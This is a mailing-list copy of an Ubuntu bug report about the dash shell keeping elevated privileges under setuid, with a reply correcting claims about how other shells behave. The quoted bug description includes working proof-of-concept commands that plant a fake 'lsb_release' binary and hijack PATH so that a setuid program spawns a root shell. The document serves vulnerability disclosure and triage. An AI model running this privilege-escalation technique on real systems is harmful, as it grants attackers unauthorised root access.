touch-packages team mailing list archive

Thread
Date
[Bug 1215660] Re: dash does not drop privileges when euid != uid, this can cause local root exploits when setuid programs use system() or popen()

To: touch-packages@xxxxxxxxxxxxxxxxxxx
From: Stephane Chazelas <stephane.chazelas+lp@xxxxxxxxx>
Date: Fri, 03 Oct 2014 15:03:16 -0000
Reply-to: Bug 1215660 <1215660@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx
There are several incorrect statements in the initial report and the
linked CVE.

1. bash doesn't drop its privilege when setuid when called as sh. It
only does so when called as bash and without the -p option. It does
however go into a mode where it does not trust its environment as much
as when it's not setuid. It still trusts  $PATH though.

2. pdksh like AT&T ksh or bash when called as sh, does not drop
privileges on startup. It enters the "privileged" mode in which it is
more careful in what it does with the environment (for instance, ignores
ENV as mandated by POSIX). Only recent versions of mksh (and possibly
OpenBSD sh/ksh) based on pdksh drop the privileges.

3. Non-Linux sh are generally not pdksh.  From the major ones, only
OpenBSD and MirBSD have shells *based* on pdksh. Other BSDs generally
have a shell based on the Almquist shell (dash itself is mostly based on
NetBSD sh) or bash (like OS/X) and commercial unices generally on AT&T
ksh88

4. So it's not most shells dropping privileges. bash (as sh), dash,
pdksh, AT&T ksh, yash don't. Only some pdksh derivatives and bash when
called as sh do.

5. calling popen("/usr/bin/lsb-release") as root is not the right
solution as lsb-release doesn't need super-user privileges and is not
guaranteed to be found in /usr/bin and is at least on Debian a python
script (python's behaviour can also be affected by env vars) that relies
on PATH to find other utilities, so PATH would still need to be
sanitized).

So dash is not any more vulnerable that any other shell in that regard
and is certainly a much better choice in terms of security for /bin/sh
than any other bigger shell like bash, zsh or AT&T ksh.

Changing dash so it drops privileges is likely to break some usages
(rare as it's widely known that calling shells in setuid contexts is
very risky).

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dash in Ubuntu.
https://bugs.launchpad.net/bugs/1215660

Title:
  dash does not drop privileges when euid != uid, this can cause local
  root exploits when setuid programs use system() or popen()

Status in “dash” package in Ubuntu:
  Triaged

Bug description:
  Poorly written setuid programs may call 'popen' or 'system' with
  incorrectly specified arguments. For instance, there is a bug in
  vmware-mount where it calls "popen('lsb-release')" (CVE-2013-1662). It
  should be "popen('/usr/bin/lsb-release')". Because of this, an
  attacker can drop a file named 'lsb-release' in . and then call
  vmware-mount, and it will happily popen the attacker controlled file
  as root.

  Now, bash has a 'privdrop' option, however debian removed this option in the 1990's:
  http://patch-tracker.debian.org/patch/series/view/bash/4.2+dfsg-0.1/privmode.diff and
  http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586

  Most shells will drop privs when euid != uid, because it turns out
  calling popen / system from setuid scripts is nearly impossible to get
  right (in fact, pretty much any setuid script is insanely difficult to
  write without a vulnerability in it.

  Ensure /bin/sh is dash
  antarus@goats5 ~ $ sudo ln -sf /bin/dash /bin/sh
  antarus@goats5 ~ $ cc -xc - -olsb_release<<<'main(){system("sh>`tty` 2>&1");}';PATH=.:$PATH vmware-mount
  # whoami   
  root

  If we switched to a sane shell (like busybox for example.)
  antarus@goats5 ~ $ sudo ln -sf /bin/busybox /bin/sh
  antarus@goats5 ~ $ cc -xc - -olsb_release<<<'main(){system("/bin/sh>`tty` 2>&1");}';PATH=.:$PATH vmware-mount

  BusyBox v1.18.5 (Ubuntu 1:1.18.5-1ubuntu4.1) built-in shell (ash)
  Enter 'help' for a list of built-in commands.

  /usr/local/google/home/antarus $ whoami
  whoami: unknown uid XXXXX # I have omitted my actual UID, needless to say it isn't uid 0 :)

  Now you may be saying 'hey i don't have vmware-mount handy' so
  instead:

  antarus@goats5 ~ $ cat /tmp/silly_setuid.c 
  #include <stdio.h>

  int main(int argc, char ** argv) {
    popen("lsb_release", "r");
  }

  antarus@goats5 ~ $ gcc /tmp/silly_setuid.c -o silly_setuid
  antarus@goats5 ~ $ sudo chown root:root silly_setuid 
  [sudo] password for antarus: 
  antarus@goats5 ~ $ sudo chmod 4755 silly_setuid 
  antarus@goats5 ~ $ cc -xc - -olsb_release<<<'main(){system("whoami>`tty` 2>&1");}';PATH=.:$PATH silly_setuid
  antarus@goats5 ~ $ root

  Distributor ID: Ubuntu
  Description:    Ubuntu 12.04.1 LTS
  Release:        12.04
  Codename:       precise

  antarus@goats5 ~ $ apt-cache policy dash
  dash:
    Installed: 0.5.7-2ubuntu2
    Candidate: 0.5.7-2ubuntu2
    Version table:
   *** 0.5.7-2ubuntu2 0
          600 my-apt-mirror ubuntu-precise/main amd64 Packages
          100 /var/lib/dpkg/status

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dash/+bug/1215660/+subscriptions